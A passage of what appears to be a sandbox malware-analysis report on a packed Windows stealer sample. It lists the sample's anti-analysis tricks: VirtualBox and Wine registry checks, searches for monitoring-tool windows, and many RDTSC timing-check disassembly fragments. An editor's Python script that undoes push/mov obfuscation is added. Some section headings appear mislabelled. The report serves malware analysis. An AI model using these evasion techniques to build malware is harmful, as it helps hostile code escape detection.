Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push ecx; mov dword ptr [esp], esi  (at 0_2_00AFC949)
Source: file.exe  Static PE information: section name: lyglkzel entropy: 7.95357659859666
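Every push/mov pair listed above is a single `push` written as two instructions: the first `push` reserves the stack slot with a junk value (a register or an immediate), and the `mov dword ptr [esp], X` overwrites that slot with the real operand, so the pair is equivalent to `push X`. The one line that is not a push is `push ecx; ret`, which is an indirect `jmp ecx` (the "call, push, ret" obfuscation signature). The following Python is an added example (the editor's code, not from the report or the sample) that normalizes such listings back to the equivalent single instruction. The input lines are constructed to match the report's format; the esp case is handled separately because `push esp` pushes the pre-decrement value whereas the pair stores the post-decrement one, so a naive rewrite would change the program's meaning.

```python
"""Undo the push/mov and push/ret substitutions listed under Data Obfuscation.

Added example (editor's code, not from the report or the sample). The packer
writes `push X` as `push <junk>; mov dword ptr [esp], X` and `jmp reg` as
`push reg; ret`; normalize() folds each pair back into one instruction.
"""
import re
from typing import List

REG = r"e(?:ax|bx|cx|dx|si|di|bp|sp)"
PUSH_MOV = re.compile(r"^push\s+(?P<junk>\S+)\s*;\s*mov\s+dword ptr \[esp\],\s*(?P<value>\S+)$", re.I)
PUSH_RET = re.compile(rf"^push\s+(?P<reg>{REG})\s*;\s*ret$", re.I)

# Constructed sample, shaped like the report's "Code function" lines (one is a
# plain instruction that must pass through unchanged).
SAMPLE: List[str] = [
    "push edx; mov dword ptr [esp], 3EAFA226h",
    "push 64CE05C3h; mov dword ptr [esp], ebp",
    "push ecx; mov dword ptr [esp], ebx",
    "push edx; mov dword ptr [esp], esp",
    "push ecx; ret",
    "mov eax, dword ptr [esp+04h]",
]


def normalize(insn: str) -> str:
    """Return the single instruction the obfuscated pair is equivalent to, or the
    input unchanged when no rule applies."""
    text = insn.strip()
    m = PUSH_MOV.match(text)
    if m:
        value = m.group("value")
        if value.lower() == "esp":
            # `push esp` stores the pre-decrement esp; the pair stores the value
            # after the decrement (old esp - 4), so keep the two-step form.
            return "sub esp, 4; mov dword ptr [esp], esp"
        return f"push {value}"  # the junk push is fully overwritten
    m = PUSH_RET.match(text)
    if m:
        return f"jmp {m.group('reg')}"  # ret pops the pushed target into eip
    return text


def normalize_listing(lines: List[str]) -> List[str]:
    return [normalize(line) for line in lines]


if __name__ == "__main__":
    for before, after in zip(SAMPLE, normalize_listing(SAMPLE)):
        print(f"{before:45} -> {after}")
```

The rewrite is safe only when nothing reads the slot between the two instructions; the pairs the report lists are adjacent, so that holds here. Feeding a disassembler's text output through normalize_listing() before pattern matching or diffing removes most of the noise the packer adds around the stealer's real code.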

Boot Survival

Source: C:\Users\user\Desktop\file.exe  Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe  Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe  Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe  Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe  Window searched: window name: Filemonclass
(each of these window-class searches was repeated three times during the run; they are the window classes of the Sysinternals Filemon, Regmon and Process Monitor tools, which is the basis of the "Tries to detect process monitoring tools" signature)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00749860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe  Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13432)
Source: C:\Users\user\Desktop\file.exe  Registry key opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe  Registry key opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: 9919BE second address: 9919C8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF154EB2266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: 9919C8 second address: 9919CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B0F37B second address: B0F37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B0E310 second address: B0E316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B0E669 second address: B0E676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FF154EB226Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B0E676 second address: B0E682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF154CE361Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B0E7BE second address: B0E7F2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF154EB2266h 0x00000008 jmp 00007FF154EB226Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007FF154EB2270h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B0EAD2 second address: B0EB0D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF154CE3616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007FF154CE3616h 0x00000011 jmp 00007FF154CE3622h 0x00000016 je 00007FF154CE3616h 0x0000001c popad 0x0000001d pop esi 0x0000001e pushad 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 jl 00007FF154CE3616h 0x00000028 popad 0x00000029 pushad 0x0000002a push eax 0x0000002b pop eax 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B106C9 second address: B106F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007FF154EB2276h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B106F1 second address: B106F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B106F6 second address: B106FB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B106FB second address: B1071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnp 00007FF154CE361Ah 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007FF154CE3616h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B1071B second address: B1071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B108AF second address: B108B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B108B4 second address: B10908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FF154EB2268h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 cld 0x00000027 push 00000000h 0x00000029 jne 00007FF154EB2272h 0x0000002f push D1B9238Ch 0x00000034 pushad 0x00000035 jno 00007FF154EB2268h 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B109E6 second address: B109EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B109EA second address: B109FE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FF154EB2266h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B109FE second address: B10A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
(each entry is a pair of rdtsc reads separated by only a few instructions; an unusually large delta between the two timestamps indicates single-stepping, an instrumented emulator or a hypervisor trapping rdtsc, which is the basis of the "Tries to detect virtualization through RDTSC time measurements" signature)
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10A02 second address: B10A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10AFD second address: B10B1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF154CE3629h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10BE5 second address: B10C39 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF154EB2268h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 3AEAE754h 0x00000013 pushad 0x00000014 sub bl, FFFFFFD4h 0x00000017 popad 0x00000018 mov dx, 798Bh 0x0000001c lea ebx, dword ptr [ebp+1245254Ch] 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007FF154EB2268h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c mov edi, eax 0x0000003e sbb si, FE3Fh 0x00000043 xchg eax, ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 js 00007FF154EB2266h 0x0000004f popad 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10C39 second address: B10C54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF154CE3627h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F6DB second address: B2F6F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB226Dh 0x00000007 jg 00007FF154EB2266h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F6F8 second address: B2F715 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154CE3629h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F715 second address: B2F71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F71F second address: B2F725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F725 second address: B2F729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FA11 second address: B2FA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF154CE3616h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FF154CE3629h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FA38 second address: B2FA40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FA40 second address: B2FA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FA45 second address: B2FA4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FA4D second address: B2FA51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FCCC second address: B2FCD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF154EB2266h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FCD6 second address: B2FCDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FCDA second address: B2FCF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jmp 00007FF154EB2270h 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3011F second address: B3013F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154CE361Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FF154CE3616h 0x00000011 ja 00007FF154CE3616h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3013F second address: B3014F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF154EB2266h 0x00000008 jno 00007FF154EB2266h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3014F second address: B30154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B302D9 second address: B302E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007FF154EB2266h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30467 second address: B30476 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154CE361Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30476 second address: B3048A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FF154EB2272h 0x0000000c jc 00007FF154EB226Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF19E1 second address: AF19EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30BF4 second address: B30BF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30BF9 second address: B30C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30C0C second address: B30C12 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30D85 second address: B30D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF154CE3616h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30D90 second address: B30D97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30D97 second address: B30DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FF154CE3629h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30F32 second address: B30F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30F36 second address: B30F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B36198 second address: B3619E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF859A second address: AF85D3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF154CE3616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FF154CE3633h 0x00000010 pop ebx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jno 00007FF154CE3616h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF85D3 second address: AF85D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B37760 second address: B37765 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3ED14 second address: B3ED18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41539 second address: B41548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41548 second address: B41568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154EB2273h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FF154EB2266h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41568 second address: B4156C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41B7A second address: B41B8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB226Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41E5E second address: B41E83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154CE3625h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jng 00007FF154CE3616h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41E83 second address: B41E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41F31 second address: B41F48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154CE3623h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41F48 second address: B41F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF154EB226Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4201F second address: B42043 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF154CE3625h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007FF154CE3637h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B425CE second address: B425D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF154EB2266h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B425D9 second address: B425DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B425DF second address: B425F5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF154EB2266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007FF154EB226Eh 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA29F second address: AFA2A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B488E5 second address: B488F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB226Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B488F4 second address: B488F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4CAF3 second address: B4CAF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4CAF7 second address: B4CAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4CAFD second address: B4CB03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4CB03 second address: B4CB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E0A1 second address: B4E0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF154EB2266h 0x0000000a jmp 00007FF154EB226Ch 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E801 second address: B4E807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E9CC second address: B4EA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FF154EB2268h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov bx, A9C1h 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov ebx, dword ptr [ebp+122D3748h] 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov bl, ah 0x0000003b mov eax, dword ptr [ebp+122D009Dh] 0x00000041 push 00000000h 0x00000043 push edx 0x00000044 call 00007FF154EB2268h 0x00000049 pop edx 0x0000004a mov dword ptr [esp+04h], edx 0x0000004e add dword ptr [esp+04h], 0000001Dh 0x00000056 inc edx 0x00000057 push edx 0x00000058 ret 0x00000059 pop edx 0x0000005a ret 0x0000005b mov edi, 46D14430h 0x00000060 or edi, dword ptr [ebp+122D2A4Ah] 0x00000066 push FFFFFFFFh 0x00000068 add dword ptr [ebp+1245FC73h], edi 0x0000006e push eax 0x0000006f pushad 0x00000070 jmp 00007FF154EB2271h 0x00000075 push eax 0x00000076 push edx 0x00000077 push ebx 0x00000078 pop ebx 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51ABB second address: B51AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51AC1 second address: B51AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B52A78 second address: B52A7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
